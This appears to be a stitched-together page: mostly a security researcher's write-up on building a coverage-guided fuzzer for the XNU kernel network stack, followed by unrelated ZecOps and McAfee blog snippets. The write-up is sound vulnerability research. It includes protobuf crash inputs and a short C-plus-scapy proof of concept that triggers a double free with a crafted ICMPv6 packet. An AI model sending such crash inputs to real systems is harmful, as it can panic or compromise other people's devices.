I’ve extended the copyin specification with my fuzzer-specific semantics: when the pointer (void*)1 is passed as an address, we interpret this as a request to fetch arbitrary bytes. Otherwise, we copy directly from that virtual memory address. This way, we can begin by passing (void*)1 everywhere in the fuzz target to get as much cheap coverage as possible. Later, as we want to construct well-formed data to pass into syscalls, we build the data in the protobuf test case handler and pass a real pointer to it, allowing it to be copied. This flexibility saves us time while permitting the construction of highly-structured data inputs as we see fit.

int __attribute__((warn_unused_result))

copyin(void* user_addr, void* kernel_addr, size_t nbytes) {

  // Address 1 means use fuzzed bytes, otherwise use real bytes.

  // NOTE: this does not support nested useraddr.

  if (user_addr != (void*)1) {

    memcpy(kernel_addr, user_addr, nbytes);

    return 0;

  }

  if (get_fuzzed_bool()) {

    return -1;

  }

  get_fuzzed_bytes(kernel_addr, nbytes);

  return 0;

}

Copyout is designed similarly. We often don’t care about the data copied out; we just care about the safety of the accesses. For that reason, we make sure to memcpy from the source buffer in all cases, using a temporary buffer when a copy to (void*)1 occurs. If the kernel copies out of bounds or from freed memory, for example, ASAN will catch it and inform us about a memory disclosure vulnerability.

Synchronization and Threads

Among the many changes made to XNU’s behavior to support this project, perhaps the most extensive and invasive are the changes I made to the synchronization and threading model. Before beginning this project, I had spent over a year working on Chrome browser process research, where high level “sequences” are preferred to using physical threads. Despite a paucity of data races, Chrome still had sequence-related bugs that were triggered by randomly servicing some of the pending work in between performing synchronous IPC calls. In an exploit for a bug found by the AppCache fuzzer, sleep calls were needed to get the asynchronous work to be completed before queueing up some more work synchronously. So I already knew that asynchronous continuation-passing style concurrency could have exploitable bugs that are easy to discover with this fuzzing approach.

I suspected I could find similar bugs if I used a similar model for sockfuzzer. Because XNU uses multiple kernel threads in its networking stack, I would have to port it to a cooperative style. To do this, I provided no-op implementations for all of the thread management functions and sync primitives, and instead randomly called the work functions that would have been called by the real threads. This involved modifying code: most worker threads run in a loop, processing new work as it comes in. I modified these infinitely looping helper functions to do one iteration of work and exposed them to the fuzzer frontend. Then I called them randomly as part of the protobuf message. The main benefit of doing the project this way was improved performance and determinism. Places where the kernel could block the fuzzer were modified to return early. Overall, it was a lot simpler and easier to manage a single-threaded process. But this decision did not end up yielding as many bugs as I had hoped. For example, I suspected that interleaving garbage collection of various network-related structures with syscalls would be more effective. It did achieve the goal of removing threading-related headaches from deploying the fuzzer, but this is a serious weakness that I would like to address in future fuzzer revisions.

Randomness

Randomness is another service provided by kernels to userland (e.g. /dev/random) and in-kernel services requiring it. This is easy to emulate: we can just return as many bytes as were requested from the current test case’s data_provider field.

Authentication

XNU features some mechanisms (KAuth, mac checks, user checks) to determine whether a given syscall is permissible. Because of the importance and relative rarity of bugs in XNU, and my willingness to triage false positives, I decided to allow all actions by default. For example, the TCP multipath code requires a special entitlement, but disabling this functionality precludes us from finding Ian’s multipath vulnerability. Rather than fuzz only code accessible inside the app sandbox, I figured I would just triage whatever comes up and report it with the appropriate severity in mind.

For example, when we create a socket, the kernel checks whether the running process is allowed to make a socket of the given domain, type, and protocol provided their KAuth credentials:

static int

socket_common(struct proc *p,

    int domain,

    int type,

    int protocol,

    pid_t epid,

    int32_t *retval,

    int delegate)

{

        struct socket *so;

        struct fileproc *fp;

        int fd, error;

        AUDIT_ARG(socket, domain, type, protocol);

#if CONFIG_MACF_SOCKET_SUBSET

        if ((error = mac_socket_check_create(kauth_cred_get(), domain,

            type, protocol)) != 0) {

                return error;

        }

#endif /* MAC_SOCKET_SUBSET */

When we reach this function in our fuzzer, we trigger an assert crash as this functionality was  stubbed.

    #6 0x7f58f49b53f3 in Assert /source/build3/../fuzz/stubs.c:21:3

    #7 0x7f58f49ba070 in kauth_cred_get /source/build3/../fuzz/fake_impls.c:272:3

    #8 0x7f58f3c70889 in socket_common /source/build3/../bsd/kern/uipc_syscalls.c:242:39

    #9 0x7f58f3c7043a in socket /source/build3/../bsd/kern/uipc_syscalls.c:214:9

    #10 0x7f58f49b45e3 in socket_wrapper /source/build3/../fuzz/syscall_wrappers.c:371:10

    #11 0x4e8598 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:655:19

Now, we need to implement kauth_cred_get. In this case, we return a (void*)1 pointer so that NULL checks on the value will pass (and if it turns out we need to model this correctly, we’ll crash again when the pointer is used).

void* kauth_cred_get() {

  return (void*)1;

}

Now we crash actually checking the KAuth permissions.

    #6 0x7fbe9219a3f3 in Assert /source/build3/../fuzz/stubs.c:21:3

    #7 0x7fbe9219f100 in mac_socket_check_create /source/build3/../fuzz/fake_impls.c:312:33

    #8 0x7fbe914558a3 in socket_common /source/build3/../bsd/kern/uipc_syscalls.c:242:15

    #9 0x7fbe9145543a in socket /source/build3/../bsd/kern/uipc_syscalls.c:214:9

    #10 0x7fbe921995e3 in socket_wrapper /source/build3/../fuzz/syscall_wrappers.c:371:10

    #11 0x4e8598 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:655:19

    #12 0x4e76c2 in LLVMFuzzerTestOneInput /source/build3/../fuzz/net_fuzzer.cc:631:1

Now we simply return 0 and move on.

int mac_socket_check_create() { return 0; }

As you can see, we don’t always need to do a lot of work to fake functionality. We can opt for a much simpler model that still gets us the results we want.

Coverage Guided Development

We’ve paid a sizable initial cost to implement this fuzz target, but we’re now entering the longest and most fun stage of the project: iterating and maintaining the fuzzer. We begin by running the fuzzer continuously (in my case, I ensured it could run on ClusterFuzz). A day of work then consists of fetching the latest corpus, running a clang-coverage visualization pass over it, and viewing the report. While initially most of the work involved fixing assertion failures to get the fuzzer working, we now look for silent implementation deficiencies only visible in the coverage reports. A snippet from the report looks like the following:

Several lines of code have a column indicating that they have been covered tens of thousands of times. Below them, you can see a switch statement for handling the parsing of IP options. Only the default case is covered approximately fifty thousand times, while the routing record options are covered 0 times.

This excerpt from IP option handling shows that we don’t support the various packets well with the current version of the fuzzer and grammar. Having this visualization is enormously helpful and necessary to succeed, as it is a source of truth about your fuzz target. By directing development work around these reports, it’s relatively easy to plan actionable and high-value tasks around the fuzzer.

I like to think about improving a fuzz target by either improving “soundness” or “completeness.” Logicians probably wouldn’t be happy with how I’m loosely using these terms, but they are a good metaphor for the task. To start with, we can improve the completeness of a given fuzz target by helping it reach code that we know to be reachable based on manual review. In the above example, I would suspect very strongly that the uncovered option handling code is reachable. But despite a long fuzzing campaign, these lines are uncovered, and therefore our fuzz target is incomplete, somehow unable to generate inputs reaching these lines. There are two ways to get this needed coverage: in a top-down or bottom-up fashion. Each has its tradeoffs. The top-down way to cover this code is to improve the existing grammar or C++ code to make it possible or more likely. The bottom-up way is to modify the code in question. For example, we could replace switch (opt) with something like switch (global_fuzzed_data->ConsumeRandomEnum(valid_enums). This bottom-up approach introduces unsoundness, as maybe these enums could never have been selected at this point. But this approach has often led to interesting-looking crashes that encouraged me to revert the change and proceed with the more expensive top-down implementation. When it’s one researcher working against potentially hundreds of thousands of lines, you need tricks to prioritize your work. By placing many cheap bets, you can revert later for free and focus on the most fruitful areas.

Improving soundness is the other side of the coin here. I’ve just mentioned reverting unsound changes and moving those changes out of the target code and into the grammar. But our fake objects are also simple models for how their real implementations behave. If those models are too simple or directly inaccurate, we may either miss bugs or introduce them. I’m comfortable missing some bugs as I think these simple fakes enable better coverage, and it’s a net win. But sometimes, I’ll observe a crash or failure to cover some code because of a faulty model. So improvements can often come in the form of making these fakes better.

All in all, there is plenty of work that can be done at any given point. Fuzzing isn’t an all or nothing one-shot endeavor for large targets like this. This is a continuous process, and as time goes on, easy gains become harder to achieve as most bugs detectable with this approach are found, and eventually, there comes a natural stopping point. But despite working on this project for several months, it’s remarkably far from the finish line despite producing several useful bug reports. The cool thing about fuzzing in this way is that it is a bit like excavating a fossil. Each target is different; we make small changes to the fuzzer, tapping away at the target with a chisel each day and letting our coverage metrics, not our biases, reveal the path forward.

Packet Delivery

I’d like to cover one example to demonstrate the value of the “bottom-up” unsound modification, as in some cases, the unsound modification is dramatically cheaper than the grammar-based one. Disabling hash checks is a well-known fuzzer-only modification when fuzzer-authors know that checksums could be trivially generated by hand. But it can also be applied in other places, such as packet delivery.

When an mbuf containing a TCP packet arrives, it is handled by tcp_input. In order for almost anything meaningful to occur with this packet, it must be matched by IP address and port to an existing process control block (PCB) for that connection, as seen below.

void

tcp_input(struct mbuf *m, int off0)

{

// ...

        if (isipv6) {

            inp = in6_pcblookup_hash(&tcbinfo, &ip6->ip6_src, th->th_sport,

                &ip6->ip6_dst, th->th_dport, 1,

                m->m_pkthdr.rcvif);

        } else

#endif /* INET6 */

        inp = in_pcblookup_hash(&tcbinfo, ip->ip_src, th->th_sport,

            ip->ip_dst, th->th_dport, 1, m->m_pkthdr.rcvif);

Here’s the IPv4 lookup code. Note that faddr, fport_arg, laddr, and lport_arg are all taken directly from the packet and are checked against the list of PCBs, one at a time. This means that we must guess two 4-byte integers and two 2-byte shorts to match the packet to the relevant PCB. Even coverage-guided fuzzing is going to have a hard time guessing its way through these comparisons. While eventually a match will be found, we can radically improve the odds of covering meaningful code by just flipping a coin instead of doing the comparisons. This change is extremely easy to make, as we can fetch a random boolean from the fuzzer at runtime. Looking up existing PCBs and fixing up the IP/TCP headers before sending the packets is a sounder solution, but in my testing this change didn’t introduce any regressions. Now when a vulnerability is discovered, it’s just a matter of fixing up headers to match packets to the appropriate PCB. That’s light work for a vulnerability researcher looking for a remote memory corruption bug.

/*

 * Lookup PCB in hash list.

 */

struct inpcb *

in_pcblookup_hash(struct inpcbinfo *pcbinfo, struct in_addr faddr,

    u_int fport_arg, struct in_addr laddr, u_int lport_arg, int wildcard,

    struct ifnet *ifp)

{

// ...

    head = &pcbinfo->ipi_hashbase[INP_PCBHASH(faddr.s_addr, lport, fport,

        pcbinfo->ipi_hashmask)];

    LIST_FOREACH(inp, head, inp_hash) {

-               if (inp->inp_faddr.s_addr == faddr.s_addr &&

-                   inp->inp_laddr.s_addr == laddr.s_addr &&

-                   inp->inp_fport == fport &&

-                   inp->inp_lport == lport) {

+               if (!get_fuzzed_bool()) {

                        if (in_pcb_checkstate(inp, WNT_ACQUIRE, 0) !=

                            WNT_STOPUSING) {

                                lck_rw_done(pcbinfo->ipi_lock);

                                return inp;


Astute readers may have noticed that the PCBs are fetched from a hash table, so it’s not enough just to replace the check. The 4 values used in the linear search are used to calculate a PCB hash, so we have to make sure all PCBs share a single bucket, as seen in the diff below. The real kernel shouldn’t do this as lookups become O(n), but we only create a few sockets, so it’s acceptable.

diff --git a/bsd/netinet/in_pcb.h b/bsd/netinet/in_pcb.h

index a5ec42ab..37f6ee50 100644

--- a/bsd/netinet/in_pcb.h

+++ b/bsd/netinet/in_pcb.h

@@ -611,10 +611,9 @@ struct inpcbinfo {

        u_int32_t               ipi_flags;

 };

-#define INP_PCBHASH(faddr, lport, fport, mask) \

-       (((faddr) ^ ((faddr) >> 16) ^ ntohs((lport) ^ (fport))) & (mask))

-#define INP_PCBPORTHASH(lport, mask) \

-       (ntohs((lport)) & (mask))

+// nedwill: let all pcbs share the same hash

+#define        INP_PCBHASH(faddr, lport, fport, mask) (0)

+#define        INP_PCBPORTHASH(lport, mask) (0)

 #define INP_IS_FLOW_CONTROLLED(_inp_) \

        ((_inp_)->inp_flags & INP_FLOW_CONTROLLED)

Checking Our Work: Reproducing the Sample Bugs

With most of the necessary supporting code implemented, we can fuzz for a while without hitting any assertions due to unimplemented stubbed functions. At this stage, I reverted the fixes for the two inspiration bugs I mentioned at the beginning of this article. Here’s what we see shortly after we run the fuzzer with those fixes reverted:

==1633983==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61d00029f474 at pc 0x00000049fcb7 bp 0x7ffcddc88590 sp 0x7ffcddc87d58

WRITE of size 20 at 0x61d00029f474 thread T0

    #0 0x49fcb6 in __asan_memmove /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:30:3

    #1 0x7ff64bd83bd9 in __asan_bcopy fuzz/san.c:37:3

    #2 0x7ff64ba9e62f in icmp_error bsd/netinet/ip_icmp.c:362:2

    #3 0x7ff64baaff9b in ip_dooptions bsd/netinet/ip_input.c:3577:2

    #4 0x7ff64baa921b in ip_input bsd/netinet/ip_input.c:2230:34

    #5 0x7ff64bd7d440 in ip_input_wrapper fuzz/backend.c:132:3

    #6 0x4dbe29 in DoIpInput fuzz/net_fuzzer.cc:610:7

    #7 0x4de0ef in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:720:9

0x61d00029f474 is located 12 bytes to the left of 2048-byte region [0x61d00029f480,0x61d00029fc80)

allocated by thread T0 here:

    #0 0x4a0479 in calloc /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:154:3

    #1 0x7ff64bd82b20 in mbuf_create fuzz/zalloc.c:157:45

    #2 0x7ff64bd8319e in mcache_alloc fuzz/zalloc.c:187:12

    #3 0x7ff64b69ae84 in m_getcl bsd/kern/uipc_mbuf.c:3962:6

    #4 0x7ff64ba9e15c in icmp_error bsd/netinet/ip_icmp.c:296:7

    #5 0x7ff64baaff9b in ip_dooptions bsd/netinet/ip_input.c:3577:2

    #6 0x7ff64baa921b in ip_input bsd/netinet/ip_input.c:2230:34

    #7 0x7ff64bd7d440 in ip_input_wrapper fuzz/backend.c:132:3

    #8 0x4dbe29 in DoIpInput fuzz/net_fuzzer.cc:610:7

    #9 0x4de0ef in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:720:9

When we inspect the test case, we see that a single raw IPv4 packet was generated to trigger this bug. This is to be expected, as the bug doesn’t require an existing connection, and looking at the stack, we can see that the test case triggered the bug in the IPv4-specific ip_input path.

commands {

  ip_input {

    raw_ip4: "M\001\000I\001\000\000\000\000\000\000\000III\333\333\333\333\333\333\333\333\333\333IIIIIIIIIIIIII\000\000\000\000\000III\333\333\333\333\333\333\333\333\333\333\333\333IIIIIIIIIIIIII"

  }

}

data_provider: ""


If we fix that issue and fuzz a bit longer, we soon see another crash, this time in the MPTCP stack. This is Ian’s MPTCP vulnerability. The ASAN report looks strange though. Why is it crashing during garbage collection in
mptcp_session_destroy? The original vulnerability was an OOB write, but ASAN couldn’t catch it because it corrupted memory within a struct. This is a well-known shortcoming of ASAN and similar mitigations, importantly the upcoming MTE. This means we don’t catch the bug until later, when a randomly corrupted pointer is accessed.

==1640571==ERROR: AddressSanitizer: attempting free on address which was not malloc()-ed: 0x6190000079dc in thread T0

    #0 0x4a0094 in free /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:123:3

    #1 0x7fbdfc7a16b0 in _FREE fuzz/zalloc.c:293:36

    #2 0x7fbdfc52b624 in mptcp_session_destroy bsd/netinet/mptcp_subr.c:742:3

    #3 0x7fbdfc50c419 in mptcp_gc bsd/netinet/mptcp_subr.c:4615:3

    #4 0x7fbdfc4ee052 in mp_timeout bsd/netinet/mp_pcb.c:118:16

    #5 0x7fbdfc79b232 in clear_all fuzz/backend.c:83:3

    #6 0x4dfd5c in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:1010:3

0x6190000079dc is located 348 bytes inside of 920-byte region [0x619000007880,0x619000007c18)

allocated by thread T0 here:

    #0 0x4a0479 in calloc /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:154:3

    #1 0x7fbdfc7a03d4 in zalloc fuzz/zalloc.c:37:10

    #2 0x7fbdfc4ee710 in mp_pcballoc bsd/netinet/mp_pcb.c:222:8

    #3 0x7fbdfc53cf8a in mptcp_attach bsd/netinet/mptcp_usrreq.c:211:15

    #4 0x7fbdfc53699e in mptcp_usr_attach bsd/netinet/mptcp_usrreq.c:128:10

    #5 0x7fbdfc0e1647 in socreate_internal bsd/kern/uipc_socket.c:784:10

    #6 0x7fbdfc0e23a4 in socreate bsd/kern/uipc_socket.c:871:9

    #7 0x7fbdfc118695 in socket_common bsd/kern/uipc_syscalls.c:266:11

    #8 0x7fbdfc1182d1 in socket bsd/kern/uipc_syscalls.c:214:9

    #9 0x7fbdfc79a26e in socket_wrapper fuzz/syscall_wrappers.c:371:10

    #10 0x4dd275 in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:655:19

Here’s the protobuf input for the crashing testcase:

commands {

  socket {

    domain: AF_MULTIPATH

    so_type: SOCK_STREAM

    protocol: IPPROTO_IP

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_0

      sae_srcaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\304"

        }

      }

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: ""

        }

      }

    }

    associd: ASSOCID_CASE_0

    flags: CONNECT_DATA_IDEMPOTENT

    flags: CONNECT_DATA_IDEMPOTENT

    flags: CONNECT_DATA_IDEMPOTENT

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_0

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: ""

        }

      }

    }

    associd: ASSOCID_CASE_0

    flags: CONNECT_DATA_IDEMPOTENT

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_0

      sae_srcaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: ""

        }

      }

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\304"

        }

      }

    }

    associd: ASSOCID_CASE_0

    flags: CONNECT_DATA_IDEMPOTENT

    flags: CONNECT_DATA_IDEMPOTENT

    flags: CONNECT_DATA_AUTHENTICATED

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_0

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: ""

        }

      }

    }

    associd: ASSOCID_CASE_0

    flags: CONNECT_DATA_IDEMPOTENT

  }

}

commands {

  close {

    fd: FD_8

  }

}

commands {

  ioctl_real {

    siocsifflags {

      ifr_name: LO0

      flags: IFF_LINK1

    }

  }

}

commands {

  close {

    fd: FD_8

  }

}

data_provider: "\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025"

Hmm, that’s quite large and hard to follow. Is the bug really that complicated? We can use libFuzzer’s crash minimization feature to find out. Protobuf-based test cases simplify nicely because even large test cases are already structured, so we can randomly edit and remove nodes from the message. After about a minute of automated minimization, we end up with the test shown below.

commands {

  socket {

    domain: AF_MULTIPATH

    so_type: SOCK_STREAM

    protocol: IPPROTO_IP

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_1

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: "bugmbuf_debutoeloListen_dedeloListen_dedebuloListete_debugmbuf_debutoeloListen_dedeloListen_dedebuloListeListen_dedebuloListe_dtrte" # string length 131

        }

      }

    }

    associd: ASSOCID_CASE_0

  }

}

data_provider: ""


This is a lot easier to read! It appears that SockFuzzer managed to open a socket from the
AF_MULTIPATH domain and called connectx on it with a sockaddr using an unexpected sa_family, in this case AF_MULTIPATH. Then the large sa_data field was used to overwrite memory. You can see some artifacts of heuristics used by the fuzzer to guess strings as “listen” and “mbuf” appear in the input. This testcase could be further simplified by modifying the sa_data to a repeated character, but I left it as is so you can see exactly what it’s like to work with the output of this fuzzer.

In my experience, the protobuf-formatted syscalls and packet descriptions were highly useful for reproducing crashes and tended to work on the first attempt. I didn’t have an excellent setup for debugging on-device, so I tried to lean on the fuzzing framework as much as I could to understand issues before proceeding with the expensive process of reproducing them.

In my previous post describing the “SockPuppet” vulnerability, I walked through one of the newly discovered vulnerabilities, from protobuf to exploit. I’d like to share another original protobuf bug report for a remotely-triggered vulnerability I reported here.

commands {

  socket {

    domain: AF_INET6

    so_type: SOCK_RAW

    protocol: IPPROTO_IP

  }

}

commands {

  set_sock_opt {

    level: SOL_SOCKET

    name: SO_RCVBUF

    val: "\021\000\000\000"

  }

}

commands {

  set_sock_opt {

    level: IPPROTO_IPV6

    name: IP_FW_ZERO

    val: "\377\377\377\377"

  }

}

commands {

  ip_input {

    tcp6_packet {

      ip6_hdr {

        ip6_hdrctl {

          ip6_un1_flow: 0

          ip6_un1_plen: 0

          ip6_un1_nxt: IPPROTO_ICMPV6

          ip6_un1_hlim: 0

        }

        ip6_src: IN6_ADDR_LOOPBACK

        ip6_dst: IN6_ADDR_ANY

      }

      tcp_hdr {

        th_sport: PORT_2

        th_dport: PORT_1

        th_seq: SEQ_1

        th_ack: SEQ_1

        th_off: 0

        th_win: 0

        th_sum: 0

        th_urp: 0

        is_pure_syn: false

        is_pure_ack: false

      }

      data: "\377\377\377\377\377\377\377\377\377\377\377\377q\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"

    }

  }

}

data_provider: ""

This automatically minimized test case requires some human translation to a report that’s actionable by developers who don’t have access to our fuzzing framework. The test creates a socket and sets some options before delivering a crafted ICMPv6 packet. You can see how the packet grammar we specified comes in handy. I started by transcribing the first three syscall messages directly by writing the following C program.

#include <sys/socket.h>

#define __APPLE_USE_RFC_3542

#include <netinet/in.h>

#include <stdio.h>

#include <unistd.h>

int main() {

    int fd = socket(AF_INET6, SOCK_RAW, IPPROTO_IP);

    if (fd < 0) {

        printf("failed\n");

        return 0;

    }

    int res;

    // This is not needed to cause a crash on macOS 10.14.6, but you can

    // try setting this option if you can't reproduce the issue.

    // int space = 1;

    // res = setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &space, sizeof(space));

    // printf("res1: %d\n", res);

    int enable = 1;

    res = setsockopt(fd, IPPROTO_IPV6, IPV6_RECVPATHMTU, &enable, sizeof(enable));

    printf("res2: %d\n", res);

    // Keep the socket open without terminating.

    while (1) {

        sleep(5);

    }

    close(fd);

    return 0;

}

With the socket open, it’s now a matter of sending a special ICMPv6 packet to trigger the bug. Using the original crash as a guide, I reviewed the code around the crashing instruction to understand which parts of the input were relevant. I discovered that sending a “packet too big” notification would reach the buggy code, so I used the scapy library for Python to send the buggy packet locally. My kernel panicked, confirming the double free vulnerability.

from scapy.all import sr1, IPv6, ICMPv6PacketTooBig, raw

outer = IPv6(dst="::1") / ICMPv6PacketTooBig() / ("\x41"*40)

print(raw(outer).hex())

p = sr1(outer)

if p:

    p.show()

Creating a working PoC from the crashing protobuf input took about an hour, thanks to the straightforward mapping from grammar to syscalls/network input and the utility of being able to debug the local crashing “kernel” using gdb.

Drawbacks

Any fuzzing project of this size will require design decisions that have some tradeoffs. The most obvious issue is the inability to detect race conditions. Threading bugs can be found with fuzzing but are still best left to static analysis and manual review as fuzzers can’t currently deal with the state space of interleaving threads. Maybe this will change in the future, but today it’s an issue. I accepted this problem and removed threading completely from the fuzzer; some bugs were missed by this, such as a race condition in the bind syscall.

Another issue lies in the fact that by replacing so much functionality by hand, it’s hard to extend the fuzzer trivially to support additional attack surfaces. This is evidenced by another issue I missed in packet filtering. I don’t support VFS at the moment, so I can’t access the bpf device. A syzkaller-like project would have less trouble with supporting this code since VFS would already be working. I made an explicit decision to build a simple tool that works very effectively and meticulously, but this can mean missing some low hanging fruit due to the effort involved.

Per-test case determinism is an issue that I’ve solved only partially. If test cases aren’t deterministic, libFuzzer becomes less efficient as it thinks some tests are finding new coverage when they really depend on one that was run previously. To mitigate this problem, I track open file descriptors manually and run all of the garbage collection thread functions after each test case. Unfortunately, there are many ioctls that change state in the background. It’s hard to keep track of them to clean up properly but they are important enough that it’s not worth disabling them just to improve determinism. If I were working on a long-term well-resourced overhaul of the XNU network stack, I would probably make sure there’s a way to cleanly tear down the whole stack to prevent this problem.

Perhaps the largest caveat of this project is its reliance on source code. Without the efficiency and productivity losses that come with binary-only research, I can study the problem more closely to the source. But I humbly admit that this approach ignores many targets and doesn’t necessarily match real attackers’ workflows. Real attackers take the shortest path they can to find an exploitable vulnerability, and often that path is through bugs found via binary-based fuzzing or reverse engineering and auditing. I intend to discover some of the best practices for fuzzing with the source and then migrate this approach to work with binaries. Binary instrumentation can assist in coverage guided fuzzing, but some of my tricks around substituting fake implementations or changing behavior to be more fuzz-friendly is a more significant burden when working with binaries. But I believe these are tractable problems, and I expect researchers can adapt some of these techniques to binary-only fuzzing efforts, even if there is additional overhead.

Open Sourcing and Future Work

This fuzzer is now open source on GitHub. I invite you to study the code and improve it! I’d like to continue the development of this fuzzer semi-publicly. Some modifications that yield new vulnerabilities may need to be embargoed until relevant patches go out. Still, I hope that I can be as transparent as possible in my research. By working publicly, it may be possible to bring the original XNU project and this fuzzer closer together by sharing the efforts. I’m hoping the upstream developers can make use of this project to perform their own testing and perhaps make their own improvements to XNU to make this type of testing more accessible. There’s plenty of remaining work to improve the existing grammar, add support for new subsystems, and deal with some high-level design improvements such as adding proper threading support.

An interesting property of the current fuzzer is that despite reaching coverage saturation on ClusterFuzz after many months, there is still reachable but uncovered code due to the enormous search space. This means that improvements in coverage-guided fuzzing could find new bugs. I’d like to encourage teams who perform fuzzing engine research to use this project as a baseline. If you find a bug, you can take the credit for it! I simply hope you share your improvements with me and the rest of the community.

Conclusion

Modern kernel development has some catching up to do. XNU and Linux suffer from some process failures that lead to shipping security regressions. Kernels, perhaps the most security-critical component of operating systems, are becoming increasingly fragile as memory corruption issues become easier to discover. Implementing better mitigations is half the battle; we need better kernel unit testing to make identifying and fixing (even non-security) bugs cheaper.

Since my last post, Apple has increased the frequency of its open-source releases. This is great for end-user security. The more publicly that Apple can develop XNU, the more that external contributors like myself may have a chance to contribute fixes and improvements directly. Maintaining internal branches for upcoming product launches while keeping most development open has helped Chromium and Android security, and I believe XNU’s development could follow this model. As software engineering grows as a field, our experience has shown us that open, shared, and continuous development has a real impact on software quality and stability by improving developer productivity. If you don’t invest in CI, unit testing, security reviews, and fuzzing, attackers may do that for you - and users pay the cost whether they recognize it or not.

New “Always-on” Application for MacOS (April updates)

22 April 2021 at 08:27
New “Always-on” Application for MacOS (April updates)

As cyberattacks targeting mobile devices are on the rise, we continue to see massive adoption from both the private and public sectors. We are really excited to share two new features which will dramatically improve the ZecOps experience! 

New “Always-on” Application for MacOS

ZecOps is making it even easier for users to perform complex investigations of their mobile devices. Now, users can inspect their mobile devices automatically each time the phone is connected to their laptop. ZecOps for Mobile supports both iOS and Android.

Send an inspection link to a customer or colleague

ZecOps administrators now have the ability to generate a unique link to download the ZecOps Collector App from the ZecOps Dashboard. The link can then be shared with the person/group whose device you wish to inspect via email, text, or Slack.

The Collector App can be downloaded on any laptop. This feature is ideal for incident responders, managed service providers, and SOC operators.

Learn more about ZecOps Mobile EDR

Access Token Theft and Manipulation Attacks – A Door to Local Privilege Escalation

20 April 2021 at 15:27
how to run a virus scan

Executive Summary

Many malware attacks designed to inflict damage on a network are armed with lateral movement capabilities. Post initial infection, such malware would usually need to perform a higher privileged task or execute a privileged command on the compromised system to be able to further enumerate the infection targets and compromise more systems on the network. Consequently, at some point during its lateral movement activities, it would need to escalate its privileges using one or the other privilege escalation techniques. Once malware or an attacker successfully escalates its privileges on the compromised system, it will acquire the ability to perform stealthier lateral movement, usually executing its tasks under the context of a privileged user, as well as bypassing mitigations like User Account Control.

Process access token manipulation is one such privilege escalation technique which is widely adopted by malware authors. These set of techniques include process access token theft and impersonation, which eventually allows malware to advance its lateral movement activities across the network in the context of another logged in user or higher privileged user.

When a user authenticates to Windows via console (interactive logon), a logon session is created, and an access token is granted to the user. Windows manages the identity, security, or access rights of the user on the system with this access token, essentially determining what system resources they can access and what tasks can be performed. An access token for a user is primarily a kernel object and an identification of that user in the system, which also contains many other details like groups, access rights, integrity level of the process, privileges, etc. Fundamentally, a user’s logon session has an access token which also references their credentials to be used for Windows single sign on (SSO) authentication to access the local or remote network resources.

Once the attacker gains an initial foothold on the target by compromising the initial system, they would want to move around the network laterally to access more resource or critical assets. One of the ways for an attacker to achieve this is to use the identity or credentials of already logged-on users on the compromised machine to pivot to other systems or escalate their privileges and perform the lateral movement in the context of another logged on higher privileged user. Process access token manipulation helps the attackers to precisely accomplish this goal.

For our YARA rule, MITRE ATT&CK techniques and to learn more about the technical details of token manipulation attacks and how malware executes these attacks successfully at the code level, read our complete technical analysis here.

Coverage

McAfee On-Access-Scan has a generic detection for this nature of malware  as shown in the below screenshot:

Additionally, the YARA rule mentioned at the end of the technical analysis document can also be used to detect the token manipulation attacks by importing the rule in the Threat detection solutions like McAfee Advance Threat Defence, this behaviour can be detected.

Summary of the Threat

